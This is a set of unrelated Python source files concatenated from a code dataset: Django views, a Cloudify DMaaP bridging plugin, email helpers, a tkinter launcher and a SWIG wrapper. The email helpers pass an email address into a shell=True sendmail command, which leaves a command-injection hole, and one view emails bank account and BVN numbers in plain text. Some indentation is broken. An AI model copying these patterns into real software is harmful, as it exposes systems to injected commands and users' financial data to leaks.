# Optional
print("Concluído.")
|
StarcoderdataPython
|
396825
|
<gh_stars>0
#!/usr/bin/env python
"""The Planet aggregator."""
__authors__ = [ "<NAME> <<EMAIL>>",
"<NAME> <<EMAIL>>" ]
__license__ = "Python"
from distutils.core import setup
from planet import __version__ as planet_ver
setup(name="planet",
version=planet_ver,
packages=["planet", "planet.compat_logging"],
scripts=["planet.py", "planet-cache.py"],
description="The Planet aggregator",
url="http://www.planetplanet.org/",
author="<NAME> and <NAME>",
author_email="<EMAIL>",
)
|
StarcoderdataPython
|
6455209
|
from django.contrib.auth import get_user_model
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.urls import reverse, reverse_lazy
from django.utils.translation import gettext_lazy as _
from django.views.generic import DetailView, RedirectView, UpdateView, ListView
from django.views.generic.edit import CreateView
from diri.users.models import Entrepreneurs
from diri.users.forms import BioForm
from formtools.wizard.views import SessionWizardView
from django.contrib import messages
from django.shortcuts import redirect, render
from django.core.files.storage import DefaultStorage, FileSystemStorage
from django.http import HttpResponseRedirect, HttpResponse
import os
from config import settings
from django.core.mail import send_mail
User = get_user_model()
class UserDetailView(LoginRequiredMixin, DetailView):
model = User
slug_field = "username"
slug_url_kwarg = "username"
user_detail_view = UserDetailView.as_view()
class UserUpdateView(LoginRequiredMixin, SuccessMessageMixin, UpdateView):
model = User
fields = ["name"]
success_message = _("Information successfully updated")
def get_success_url(self):
return self.request.user.get_absolute_url() # type: ignore [union-attr]
def get_object(self):
return self.request.user
user_update_view = UserUpdateView.as_view()
class UserRedirectView(LoginRequiredMixin, RedirectView):
permanent = False
def get_redirect_url(self):
return reverse("users:detail", kwargs={"username": self.request.user.username})
user_redirect_view = UserRedirectView.as_view()
class ApplyNow(SuccessMessageMixin, CreateView):
template_name = "pages/home.html"
model = Entrepreneurs
form_class = BioForm
success_message = _("Your application has been submitted successfully")
success_url = reverse_lazy("home")
def form_valid(self, form):
entrepreneurs = form.save(commit=False)
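        # build a plain-text summary of the submitted application for the notification email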
msg = """Name: {name}\nState: {state}\nLGA: {lga}\nBank: {bank}\nAccount: {acc_no}\nBVN: {bvn}\nEmail: {email}\nPhone: {phone}""".format(
name=entrepreneurs.first_name + " " + entrepreneurs.mid_name + " " + entrepreneurs.last_name,
state=entrepreneurs.state,
lga=entrepreneurs.lga,
bank=entrepreneurs.bank_name,
acc_no=entrepreneurs.acc_no,
bvn=entrepreneurs.bvn,
email=entrepreneurs.email,
phone=entrepreneurs.phone,
)
send_mail(
"NEW ENTREPRENEUR REGISTERED",
msg,
"<EMAIL>",
["<EMAIL>", "<EMAIL>"],
fail_silently=False,
)
return super(ApplyNow, self).form_valid(form)
apply_now = ApplyNow.as_view()
# FORMS = [
# ("bio", BioForm),
# ("statement", StatementForm),
# ("validate", ValidateForm)
# ]
# class ApplyNow(SessionWizardView):
# # model = Entrepreneurs
# template_name = "pages/home.html"
# form_list = [BioForm, StatementForm, ValidateForm]
# file_storage = DefaultStorage()
# # def get_form_initial(self, step):
# # if "entrepreneurs_id" in self.kwargs:
# # return {}
# # initial = self.initial_dict.get(step, {})
# # return initial
# # def get_form_instance(self, step):
# # if "entrepreneurs_id" in self.kwargs and step == 0:
# # entrepreneurs_id = self.kwargs['entrepreneurs_id']
# # return Entrepreneurs.objects.get(pk=entrepreneurs_id)
# # elif "entrepreneurs_id" in self.kwargs and step == 1:
# # entrepreneurs_id = self.kwargs['entrepreneurs_id']
# # return Entrepreneurs.objects.get(pk=entrepreneurs_id)
# # return self.instance_dict.get(step, None)
# # def get(self, request, *args, **kwargs):
# # try:
# # return self.render(self.get_form())
# # except KeyError:
# # return super().get(request, *args, **kwargs)
# def done(self, form_list, *args, **kwargs):
# for form in form_list:
# form_data = form.cleaned_data
# entrepreneurs = Entrepreneurs.objects.create(**form_data)
# print(entrepreneurs)
# msg = """Name: {name}\nState: {state}\nLGA: {lga}\nBank: {bank}\nAccount: {acc_no}\nBVN: {bvn}\nEmail: {email}\nPhone: {phone}""".format(name=entrepreneurs.__str__, state=entrepreneurs.state, lga=entrepreneurs.lga, bank=entrepreneurs.bank_name, acc_no=entrepreneurs.acc_no, bvn=entrepreneurs.bvn, email=entrepreneurs.email, phone=entrepreneurs.phone)
# send_mail("NEW ENTREPRENEUR REGISTERED", msg, "<EMAIL>", ["<EMAIL>", "<EMAIL>"], fail_silently=False)
# messages.success(
# self.request, "Your application has been submitted successfully"
# )
# return HttpResponseRedirect('/')
# apply_now = ApplyNow.as_view(FORMS)
|
StarcoderdataPython
|
9771678
|
<reponame>UKHomeOffice/PythonFakerExtensions
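# Mapping of UK financial institutions to four-letter bank identifier codes,
# presumably consumed by the Faker extension to generate realistic-looking bank data.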
financial_institutions = {
"Barclays": {"bank_code": "BARC"},
"Bank of Scotland": {"bank_code": "BOFS"},
"Halifax": {"bank_code": "HLFX"},
"HSBC": {"bank_code": "MIDL"},
"Natwest": {"bank_code": "NWBK"},
"Nationwide": {"bank_code": "NAIA"},
"Royal Bank of Scotland": {"bank_code": "RBOS"},
"Santander": {"bank_code": "ABBY"},
"Starling Bank": {"bank_code": "SRLG"},
"thinkmoney": {"bank_code": "RBOS"},
"TSB": {"bank_code": "TSBS"},
"Virgin Money": {"bank_code": "NRNB"}
}
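# A minimal usage sketch (hypothetical -- the real provider code is not shown here):
# bank = "Barclays"
# bank_code = financial_institutions[bank]["bank_code"]  # -> "BARC"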
|
StarcoderdataPython
|
6644058
|
# ============LICENSE_START====================================================
# org.onap.dcaegen2
# =============================================================================
# Copyright (c) 2017-2020 AT&T Intellectual Property. All rights reserved.
# Copyright (c) 2020 Pantheon.tech. All rights reserved.
# =============================================================================
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============LICENSE_END======================================================
from cloudify import ctx
from cloudify.decorators import operation
from cloudify.exceptions import NonRecoverableError
from dmaapplugin import DMAAP_API_URL, DMAAP_USER, DMAAP_PASS
from dmaapplugin.dmaaputils import random_string
from dmaapcontrollerif.dmaap_requests import DMaaPControllerHandle
# Set up a subscriber to a source feed
def _set_up_subscriber(dmc, source_feed_id, loc, delivery_url, username, userpw):
# Add subscriber to source feed
add_sub = dmc.add_subscriber(source_feed_id, loc, delivery_url, username, userpw)
add_sub.raise_for_status()
return add_sub.json()
# Set up a publisher to a target feed
def _set_up_publisher(dmc, target_feed_id, loc):
username = random_string(8)
userpw = random_string(16)
add_pub = dmc.add_publisher(target_feed_id, loc, username, userpw)
add_pub.raise_for_status()
pub_info = add_pub.json()
return pub_info["pubId"], username, userpw
# Get a central location to use when creating a publisher or subscriber
def _get_central_location(dmc):
locations = dmc.get_dcae_central_locations()
if len(locations) < 1:
raise Exception('No central location found for setting up DR bridging')
return locations[0] # We take the first one. Typically there will be two central locations
# Set up a "bridge" between two feeds internal to DCAE
# A source feed "bridges_to" a target feed, meaning that anything published to
# the source feed will be delivered to subscribers to the target feed (as well as
# to subscribers of the source feed).
#
# The bridge is established by first adding a publisher to the target feed. The result of doing this
# is a publish URL and a set of publication credentials.
# The publish URL and publication credentials are used to set up a subscriber to the source feed.
# I.e., we tell the source feed to deliver to an endpoint which is actually a publish
# endpoint for the target feed.
@operation
def create_dr_bridge(**kwargs):
try:
# Get source and target feed ids
if 'feed_id' in ctx.target.instance.runtime_properties:
target_feed_id = ctx.target.instance.runtime_properties['feed_id']
else:
raise Exception('Target feed has no feed_id property')
if 'feed_id' in ctx.source.instance.runtime_properties:
source_feed_id = ctx.source.instance.runtime_properties['feed_id']
else:
raise Exception('Source feed has no feed_id property')
dmc = DMaaPControllerHandle(DMAAP_API_URL, DMAAP_USER, DMAAP_PASS, ctx.logger)
# Get a location to use when creating a publisher or subscriber--a central location seems reasonable
loc = _get_central_location(dmc)
ctx.logger.info('Creating bridge from feed {0} to feed {1} using location {2}'.format(source_feed_id, target_feed_id, loc))
# Add publisher to target feed
publisher_id, username, userpw = _set_up_publisher(dmc, target_feed_id, loc)
ctx.logger.info("Added publisher id {0} to target feed {1} with user {2}".format(publisher_id, target_feed_id, username))
# Add subscriber to source feed
delivery_url = ctx.target.instance.runtime_properties['publish_url']
subscriber_info = _set_up_subscriber(dmc, source_feed_id, loc, delivery_url, username, userpw)
subscriber_id = subscriber_info["subId"]
ctx.logger.info("Added subscriber id {0} to source feed {1} with delivery url {2}".format(subscriber_id, source_feed_id, delivery_url))
# Save the publisher and subscriber IDs on the source node, indexed by the target node id
ctx.source.instance.runtime_properties[ctx.target.node.id] = {"publisher_id": publisher_id, "subscriber_id": subscriber_id}
except Exception as e:
ctx.logger.error("Error creating bridge: {0}".format(e))
raise NonRecoverableError(e)
# Set up a bridge from an internal DCAE feed to a feed in an external Data Router system
# The target feed needs to be provisioned in the external Data Router system. A publisher
# to that feed must also be set up in the external Data Router system. The publish URL,
# username, and password need to be captured in a target node of type dcae.nodes.ExternalTargetFeed.
# The bridge is established by setting up a subscriber to the internal DCAE source feed using the
# external feed publisher parameters as delivery parameters for the subscriber.
@operation
def create_external_dr_bridge(**kwargs):
try:
# Make sure target feed has full set of properties
if 'url' in ctx.target.node.properties and 'username' in ctx.target.node.properties and 'userpw' in ctx.target.node.properties:
url = ctx.target.node.properties['url']
username = ctx.target.node.properties['username']
userpw = ctx.target.node.properties['userpw']
else:
raise Exception ("Target feed missing url, username, and/or user pw")
# Make sure source feed has a feed ID
if 'feed_id' in ctx.source.instance.runtime_properties:
source_feed_id = ctx.source.instance.runtime_properties['feed_id']
else:
raise Exception('Source feed has no feed_id property')
dmc = DMaaPControllerHandle(DMAAP_API_URL, DMAAP_USER, DMAAP_PASS, ctx.logger)
# Get a central location to use when creating subscriber
loc = _get_central_location(dmc)
ctx.logger.info('Creating external bridge from feed {0} to external url {1} using location {2}'.format(source_feed_id, url, loc))
# Create subscription to source feed using properties of the external target feed
subscriber_info = _set_up_subscriber(dmc, source_feed_id, loc, url, username, userpw)
subscriber_id = subscriber_info["subId"]
ctx.logger.info("Added subscriber id {0} to source feed {1} with delivery url {2}".format(subscriber_id, source_feed_id, url))
# Save the subscriber ID on the source node, indexed by the target node id
ctx.source.instance.runtime_properties[ctx.target.node.id] = {"subscriber_id": subscriber_id}
except Exception as e:
ctx.logger.error("Error creating external bridge: {0}".format(e))
raise NonRecoverableError(e)
# Set up a bridge from a feed in an external Data Router system to an internal DCAE feed.
# The bridge is established by creating a publisher on the internal DCAE feed. Then a subscription
# to the external feed is created through manual provisioning in the external Data Router system, using
# the publish URL and the publisher username and password for the internal feed as the delivery parameters
# for the external subscription.
# In order to obtain the publish URL, publisher username, and password, a blueprint using this sort of
# bridge will typically have an output that exposes the runtime_property set on the source node in this operation.
@operation
def create_external_source_dr_bridge(**kwargs):
try:
# Get target feed id
if 'feed_id' in ctx.target.instance.runtime_properties:
target_feed_id = ctx.target.instance.runtime_properties['feed_id']
else:
raise Exception('Target feed has no feed_id property')
dmc = DMaaPControllerHandle(DMAAP_API_URL, DMAAP_USER, DMAAP_PASS, ctx.logger)
# Get a central location to use when creating a publisher
loc = _get_central_location(dmc)
# Create a publisher on the target feed
publisher_id, username, userpw = _set_up_publisher(dmc, target_feed_id, loc)
# Save the publisher info on the source node, indexed by the target node
ctx.source.instance.runtime_properties[ctx.target.node.id] = {"publisher_id": publisher_id, "url": ctx.target.instance.runtime_properties["publish_url"], "username": username, "userpw": userpw}
except Exception as e:
ctx.logger.error("Error creating external source bridge: {0}".format(e))
# Remove the bridge between the relationship source and target.
# For a bridge between 2 internal feeds, deletes the subscriber on the source feed and the publisher on the target feed.
# For a bridge to an external target feed, deletes the subscriber on the source feed.
# For a bridge from an external source feed, deletes the publisher on the target feed.
@operation
def remove_dr_bridge(**kwargs):
try:
dmc = DMaaPControllerHandle(DMAAP_API_URL, DMAAP_USER, DMAAP_PASS, ctx.logger)
if ctx.target.node.id in ctx.source.instance.runtime_properties:
if 'subscriber_id' in ctx.source.instance.runtime_properties[ctx.target.node.id]:
# Delete the subscription for this bridge
ctx.logger.info("Removing bridge -- deleting subscriber {0}".format(ctx.source.instance.runtime_properties[ctx.target.node.id]['subscriber_id']))
dmc.delete_subscriber(ctx.source.instance.runtime_properties[ctx.target.node.id]['subscriber_id'])
            if 'publisher_id' in ctx.source.instance.runtime_properties[ctx.target.node.id]:
# Delete the publisher for this bridge
ctx.logger.info("Removing bridge -- deleting publisher {0}".format(ctx.source.instance.runtime_properties[ctx.target.node.id]['publisher_id']))
dmc.delete_publisher(ctx.source.instance.runtime_properties[ctx.target.node.id]['publisher_id'])
ctx.logger.info("Remove bridge from {0} to {1}".format(ctx.source.node.id, ctx.target.node.id))
except Exception as e:
ctx.logger.error("Error removing bridge: {0}".format(e))
# Let the uninstall workflow proceed--don't throw a NonRecoverableError
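# Illustrative sketch only (not part of the plugin): the shape of the runtime_properties
# entries the operations above create and that remove_dr_bridge later consumes. The node
# id keys and all values below are hypothetical examples.
#
#   ctx.source.instance.runtime_properties["external_target_feed"] = {
#       "subscriber_id": "42"                      # set by create_external_dr_bridge
#   }
#   ctx.source.instance.runtime_properties["external_source_feed"] = {
#       "publisher_id": "7",                       # set by create_external_source_dr_bridge
#       "url": "https://dr-node:8443/publish/99",
#       "username": "feeduser",
#       "userpw": "feedpw"
#   }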
|
StarcoderdataPython
|
8059584
|
<reponame>bionicles/neuromax
import tensorflow as tf
from tools import log, pipe
import nature
L = tf.keras.layers
def get_output(G, AI, id):
node = G.node[id]
log('get output for', node)
    if node["shape"] == "cylinder":
return
if node["output"] is not None:
return node["output"]
node_type = node["node_type"]
brick = tf.identity
    if node_type == "input":
spec = node['spec']
node['input'] = inputs = nature.Input(spec, batch_size=AI.batch)
brick = nature.Sensor(AI, spec)
else:
inputs = [get_output(G, AI, p) for p in list(G.predecessors(id))]
if len(inputs) > 1:
inputs = nature.Merge(AI)(inputs)
else:
inputs = inputs[0]
    if node_type == "merge":
brick = pipe(nature.Regularizer(), L.BatchNormalization())
        if 0 not in G.nodes() and id == "merge_1":
brick = tf.identity
    if node_type == 'brick':
brick = nature.Brick(id, AI)(AI, units=AI.code_spec.shape[-1])
if node_type in ["output", 'critic']:
brick = nature.Actuator(AI, node['spec'])
output = brick(inputs)
node["output"] = output
node["brick"] = brick
return output
|
StarcoderdataPython
|
4816780
|
import os
HOME_DIR = os.path.expanduser("~")
ROOT_DIR = os.path.join(HOME_DIR, "DAZ 3D", "Bridges", "Daz To Maya")
EXPORT_DIR = os.path.join(ROOT_DIR, "Exports")
|
StarcoderdataPython
|
5164621
|
# -*- coding: utf-8 -*-
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
sys.path.insert(0, '.')
from python_lib import __version__, __doc__
setup(
name="python_lib",
version=__version__,
description=__doc__,
packages=["python_library"],
platforms=["any"],
classifiers=[
'Development Status :: 1 - Planning',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: Implementation :: CPython',
'Topic :: Software Development :: Libraries :: Python Modules'
],
)
|
StarcoderdataPython
|
1768749
|
import subprocess
from datetime import datetime
from email.mime.text import MIMEText
from smtplib import SMTP_SSL
from uuid import uuid4
from pymongo.collection import Collection
def send_confirmation_email(col: Collection, email: str):
# Generate a code
confirmation_code = str(uuid4())
col.update_one({'email': email}, {'$set': {
'createdAt': datetime.now(), 'confirmationCode': confirmation_code
}})
    # Send activation email using the current Linux user (if you don't have an MTA you can disable it)
message = f"https://golisten.ucd.ie/confirm-email?{confirmation_code}\r\n" \
f"Click the link to confirm your email address and it will be invalid in 30 minutes"
subject = "Please confirm your account"
sender = '<EMAIL>'
subprocess.run(f'echo "Content-Type: text/plain\r\nFrom: {sender}\r\nTo: {email}\r\n'
f'Subject: {subject}\r\n\r\n{message}" | sendmail -f {sender} {email}', shell=True)
def send_password_reset_email(confirmation: str, email: str):
    # Send email using the current Linux user
message = f"https://golisten.ucd.ie/find-password?{confirmation}\r\n" \
f"You are resetting the password and the link will be invalid in 30 minutes"
subject = "Please check your reset password link"
sender = '<EMAIL>'
subprocess.run(f'echo "Content-Type: text/plain\r\nFrom: {sender}\r\nTo: {email}\r\n'
f'Subject: {subject}\r\n\r\n{message}" | sendmail -f {sender} {email}', shell=True)
def send_password_reset_email2(confirmation: str, target_email: str):
# Create an email content
msg = MIMEText(f"https://golisten.ucd.ie/find-password?{confirmation}\r\n"
f"You are resetting the password and the link will be invalid in 30 minutes\r\n")
msg['Subject'] = 'Please reset your password'
msg['From'] = '<EMAIL>'
msg['To'] = target_email
# Connect to localhost email server
conn = SMTP_SSL('localhost')
try:
# Login and send email
conn.sendmail('<EMAIL>', target_email, msg.as_string())
finally:
conn.quit()
# subprocess.run(f'echo "{message}" | mail -s "{subject}" {email}', shell=True)
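if __name__ == '__main__':
    # Minimal usage sketch, not part of the original module. Assumes a local MongoDB
    # instance and a working sendmail binary on the host; the database and collection
    # names below are hypothetical.
    from pymongo import MongoClient

    client = MongoClient("mongodb://localhost:27017")
    users = client["listening_test"]["users"]
    send_confirmation_email(users, "someone@example.com")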
|
StarcoderdataPython
|
8174254
|
# -*- coding: utf-8; -*-
import sys
import tkinter
from tkinter import ttk
import glob
import gui
import data
import os.path
import time
import urllib.parse
def show(conf_dir):
root = tkinter.Tk()
    def createCombobox(parent, title, valList, onSelected):
frame = tkinter.LabelFrame(parent, bd=2, relief="ridge", text=title)
frame.pack(fill="both", expand=True)
val = tkinter.StringVar()
combo = ttk.Combobox(frame, textvariable=val, state='readonly')
combo.config(values=valList)
combo.set(valList[0])
if onSelected:
combo.bind("<<ComboboxSelected>>", onSelected)
combo.pack(fill="both", expand=True)
return val
pathList = []
    for path in glob.glob(os.path.join(conf_dir, "*")):
basename = os.path.basename(path)
pathList.append(urllib.parse.unquote(basename))
new_config_txt = "<new config>"
pathList.append(new_config_txt)
    confPathVar = createCombobox(root, "config", pathList, None)
def pushedButton(event):
conf_path = confPathVar.get()
root.destroy()
history_path = "history.json"
history = data.History.loadFile(history_path)
if conf_path == new_config_txt:
new_config = True
param = data.Parameter()
param.game_title = "%d" % (time.time())
else:
new_config = False
conf_path = os.path.join(conf_dir, urllib.parse.quote(conf_path))
param = data.Parameter.loadFile(conf_path)
gui.show(param, history)
history.save(history_path)
if new_config:
title = urllib.parse.quote(param.game_title)
conf_path = os.path.join(conf_dir, "%s.json" % (title))
param.save(conf_path)
okButton = tkinter.Button(root, text=u'OK', width=50)
okButton.bind("<1>", pushedButton)
okButton.pack(fill="both", expand=True)
root.mainloop()
if __name__ == '__main__':
show("conf")
|
StarcoderdataPython
|
98768
|
from .Pane import Pane # Since the other classes use Pane is must be first
from .CluePane import CluePane
from .MediaPane import MediaPane
from .ChatPane import ChatPane
from .AppPane import AppPane
__all__ = ['CluePane', 'MediaPane', 'Pane', 'ChatPane', 'AppPane']
|
StarcoderdataPython
|
3580668
|
<filename>UDEMY-Learn Python Programming Masterclass/Section 4-Program Flow Control in Python/exercise5.py
# Extracting capitals
# Write a program to print out the capital letters in the string
#
# "Alright, but apart from the Sanitation, the Medicine, Education, Wine, Public Order, Irrigation, Roads, the Fresh-Water System, and Public Health, what have the Romans ever done for us?"
#
# Check out the string methods for one way to test if a character is in uppercase.
quote = """
Alright, but apart from the Sanitation, the Medicine, Education, Wine,
Public Order, Irrigation, Roads, the Fresh-Water System,
and Public Health, what have the Romans ever done for us?
"""
# Use a for loop and an if statement to print just the capitals in the quote above.
for char in quote:
if char.isupper():
print(char)
|
StarcoderdataPython
|
5053505
|
<filename>bin/ADFRsuite/CCSBpckgs/geomutils/efitlib.py
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.5
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_efitlib', [dirname(__file__)])
except ImportError:
import _efitlib
return _efitlib
if fp is not None:
try:
_mod = imp.load_module('_efitlib', fp, pathname, description)
finally:
fp.close()
return _mod
_efitlib = swig_import_helper()
del swig_import_helper
else:
import _efitlib
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr_nondynamic(self, class_type, name, static=1):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
if (not static):
return object.__getattr__(self, name)
else:
raise AttributeError(name)
def _swig_getattr(self, class_type, name):
return _swig_getattr_nondynamic(self, class_type, name, 0)
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object:
pass
_newclass = 0
class ellipsoid(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, ellipsoid, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, ellipsoid, name)
__repr__ = _swig_repr
__swig_setmethods__["name"] = _efitlib.ellipsoid_name_set
__swig_getmethods__["name"] = _efitlib.ellipsoid_name_get
if _newclass:
name = _swig_property(_efitlib.ellipsoid_name_get, _efitlib.ellipsoid_name_set)
__swig_setmethods__["position"] = _efitlib.ellipsoid_position_set
__swig_getmethods__["position"] = _efitlib.ellipsoid_position_get
if _newclass:
position = _swig_property(_efitlib.ellipsoid_position_get, _efitlib.ellipsoid_position_set)
__swig_setmethods__["axis"] = _efitlib.ellipsoid_axis_set
__swig_getmethods__["axis"] = _efitlib.ellipsoid_axis_get
if _newclass:
axis = _swig_property(_efitlib.ellipsoid_axis_get, _efitlib.ellipsoid_axis_set)
__swig_setmethods__["orientation"] = _efitlib.ellipsoid_orientation_set
__swig_getmethods__["orientation"] = _efitlib.ellipsoid_orientation_get
if _newclass:
orientation = _swig_property(_efitlib.ellipsoid_orientation_get, _efitlib.ellipsoid_orientation_set)
__swig_setmethods__["inv_orientation"] = _efitlib.ellipsoid_inv_orientation_set
__swig_getmethods__["inv_orientation"] = _efitlib.ellipsoid_inv_orientation_get
if _newclass:
inv_orientation = _swig_property(_efitlib.ellipsoid_inv_orientation_get, _efitlib.ellipsoid_inv_orientation_set)
__swig_setmethods__["tensor"] = _efitlib.ellipsoid_tensor_set
__swig_getmethods__["tensor"] = _efitlib.ellipsoid_tensor_get
if _newclass:
tensor = _swig_property(_efitlib.ellipsoid_tensor_get, _efitlib.ellipsoid_tensor_set)
def getPosition(self):
return _efitlib.ellipsoid_getPosition(self)
def getAxis(self):
return _efitlib.ellipsoid_getAxis(self)
def getOrientation(self):
return _efitlib.ellipsoid_getOrientation(self)
def __init__(self):
this = _efitlib.new_ellipsoid()
try:
self.this.append(this)
except:
self.this = this
__swig_destroy__ = _efitlib.delete_ellipsoid
__del__ = lambda self: None
ellipsoid_swigregister = _efitlib.ellipsoid_swigregister
ellipsoid_swigregister(ellipsoid)
class efit_info(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, efit_info, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, efit_info, name)
__repr__ = _swig_repr
__swig_setmethods__["weightflag"] = _efitlib.efit_info_weightflag_set
__swig_getmethods__["weightflag"] = _efitlib.efit_info_weightflag_get
if _newclass:
weightflag = _swig_property(_efitlib.efit_info_weightflag_get, _efitlib.efit_info_weightflag_set)
__swig_setmethods__["covarflag"] = _efitlib.efit_info_covarflag_set
__swig_getmethods__["covarflag"] = _efitlib.efit_info_covarflag_get
if _newclass:
covarflag = _swig_property(_efitlib.efit_info_covarflag_get, _efitlib.efit_info_covarflag_set)
__swig_setmethods__["volumeflag"] = _efitlib.efit_info_volumeflag_set
__swig_getmethods__["volumeflag"] = _efitlib.efit_info_volumeflag_get
if _newclass:
volumeflag = _swig_property(_efitlib.efit_info_volumeflag_get, _efitlib.efit_info_volumeflag_set)
__swig_setmethods__["matrixflag"] = _efitlib.efit_info_matrixflag_set
__swig_getmethods__["matrixflag"] = _efitlib.efit_info_matrixflag_get
if _newclass:
matrixflag = _swig_property(_efitlib.efit_info_matrixflag_get, _efitlib.efit_info_matrixflag_set)
__swig_setmethods__["nocenterflag"] = _efitlib.efit_info_nocenterflag_set
__swig_getmethods__["nocenterflag"] = _efitlib.efit_info_nocenterflag_get
if _newclass:
nocenterflag = _swig_property(_efitlib.efit_info_nocenterflag_get, _efitlib.efit_info_nocenterflag_set)
__swig_setmethods__["noscaleflag"] = _efitlib.efit_info_noscaleflag_set
__swig_getmethods__["noscaleflag"] = _efitlib.efit_info_noscaleflag_get
if _newclass:
noscaleflag = _swig_property(_efitlib.efit_info_noscaleflag_get, _efitlib.efit_info_noscaleflag_set)
__swig_setmethods__["nosortflag"] = _efitlib.efit_info_nosortflag_set
__swig_getmethods__["nosortflag"] = _efitlib.efit_info_nosortflag_get
if _newclass:
nosortflag = _swig_property(_efitlib.efit_info_nosortflag_get, _efitlib.efit_info_nosortflag_set)
__swig_setmethods__["count"] = _efitlib.efit_info_count_set
__swig_getmethods__["count"] = _efitlib.efit_info_count_get
if _newclass:
count = _swig_property(_efitlib.efit_info_count_get, _efitlib.efit_info_count_set)
__swig_setmethods__["cov_scale"] = _efitlib.efit_info_cov_scale_set
__swig_getmethods__["cov_scale"] = _efitlib.efit_info_cov_scale_get
if _newclass:
cov_scale = _swig_property(_efitlib.efit_info_cov_scale_get, _efitlib.efit_info_cov_scale_set)
__swig_setmethods__["ell_scale"] = _efitlib.efit_info_ell_scale_set
__swig_getmethods__["ell_scale"] = _efitlib.efit_info_ell_scale_get
if _newclass:
ell_scale = _swig_property(_efitlib.efit_info_ell_scale_get, _efitlib.efit_info_ell_scale_set)
def __init__(self):
this = _efitlib.new_efit_info()
try:
self.this.append(this)
except:
self.this = this
__swig_destroy__ = _efitlib.delete_efit_info
__del__ = lambda self: None
efit_info_swigregister = _efitlib.efit_info_swigregister
efit_info_swigregister(efit_info)
def fitEllipse(pts, ell_scale, cov_scale, eptr, ellipsoid):
return _efitlib.fitEllipse(pts, ell_scale, cov_scale, eptr, ellipsoid)
fitEllipse = _efitlib.fitEllipse
def vec_normalize(vector_in_out):
return _efitlib.vec_normalize(vector_in_out)
vec_normalize = _efitlib.vec_normalize
def vec_centroid(count, src, p):
return _efitlib.vec_centroid(count, src, p)
vec_centroid = _efitlib.vec_centroid
def vec_dot(arg1, arg2):
return _efitlib.vec_dot(arg1, arg2)
vec_dot = _efitlib.vec_dot
def vec_magsq(VECTOR):
return _efitlib.vec_magsq(VECTOR)
vec_magsq = _efitlib.vec_magsq
def vec_mag(VECTOR):
return _efitlib.vec_mag(VECTOR)
vec_mag = _efitlib.vec_mag
def vec_distancesq(arg1, arg2):
return _efitlib.vec_distancesq(arg1, arg2)
vec_distancesq = _efitlib.vec_distancesq
def vec_distance(arg1, arg2):
return _efitlib.vec_distance(arg1, arg2)
vec_distance = _efitlib.vec_distance
def vec_max(VECTOR):
return _efitlib.vec_max(VECTOR)
vec_max = _efitlib.vec_max
def vec_length(VECTOR):
return _efitlib.vec_length(VECTOR)
vec_length = _efitlib.vec_length
def vec_ctos(VECTOR):
return _efitlib.vec_ctos(VECTOR)
vec_ctos = _efitlib.vec_ctos
def vec_stoc(VECTOR):
return _efitlib.vec_stoc(VECTOR)
vec_stoc = _efitlib.vec_stoc
def vec_sub(arg1, arg2):
return _efitlib.vec_sub(arg1, arg2)
vec_sub = _efitlib.vec_sub
def vec_copy(VECTOR):
return _efitlib.vec_copy(VECTOR)
vec_copy = _efitlib.vec_copy
def vec_add(arg1, arg2):
return _efitlib.vec_add(arg1, arg2)
vec_add = _efitlib.vec_add
def vec_scale(f, VECTOR):
return _efitlib.vec_scale(f, VECTOR)
vec_scale = _efitlib.vec_scale
def vec_zero():
return _efitlib.vec_zero()
vec_zero = _efitlib.vec_zero
def vec_cross(arg1, arg2):
return _efitlib.vec_cross(arg1, arg2)
vec_cross = _efitlib.vec_cross
def vec_mult(arg1, arg2):
return _efitlib.vec_mult(arg1, arg2)
vec_mult = _efitlib.vec_mult
def vec_offset(s, arg2, arg3):
return _efitlib.vec_offset(s, arg2, arg3)
vec_offset = _efitlib.vec_offset
def vec_rand():
return _efitlib.vec_rand()
vec_rand = _efitlib.vec_rand
def vec_average(arg1, arg2, arg3):
return _efitlib.vec_average(arg1, arg2, arg3)
vec_average = _efitlib.vec_average
def vec_transform(VECTOR, ARRAY2D):
return _efitlib.vec_transform(VECTOR, ARRAY2D)
vec_transform = _efitlib.vec_transform
def vec_ftransform(VECTOR, ARRAY2D):
return _efitlib.vec_ftransform(VECTOR, ARRAY2D)
vec_ftransform = _efitlib.vec_ftransform
def mat_jacobi(ARRAY2D):
return _efitlib.mat_jacobi(ARRAY2D)
